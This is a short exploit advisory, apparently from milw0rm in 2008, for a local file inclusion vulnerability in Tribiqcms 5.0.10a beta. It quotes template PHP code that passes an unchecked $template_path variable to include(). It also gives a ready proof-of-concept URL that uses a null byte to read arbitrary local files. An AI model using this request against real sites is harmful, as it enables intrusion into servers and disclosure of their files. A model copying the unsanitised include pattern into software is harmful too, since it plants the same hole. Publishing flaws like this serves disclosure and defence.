_____ ____ __ __ _ ____ ____ ____
|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___|
| | | |_) | \ V / / _ \ | | _ | | | |
| | | _ < | | / ___ \ | |_| | _ | |___ | |___
|_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____|
Tribiqcms 5.0.10a (beta) Local File Inclusion Vulnerability
Vuln Code In : /Community-5.0.10a/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php
<div id="header">
<div id="logo"> <img src="templates/<?php echo $template_path;?>/images/logo.gif" alt="Company Name" /> </div>
<div id="language_selector">
<?php include "templates/".$template_path."/includes/language_box.inc.php";?> <--x
</div>
<div id="search_box">
<div id="searchbox_holder">
<?php include "templates/".$template_path."/includes/searchbox.inc.php";?><--x
</div>
</div>
</div>
POC :
/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=Local File %00
____ _ _ __ __
/ ___| ___ | | __| | | \/ |
| | _ / _ \ | | / _` | | |\/| |
| |_| | | (_) | | |___ | (_| | | | | |
\____| \___/ |_____| \__,_| _____ |_| |_|
|_____|
# milw0rm.com [2008-10-31]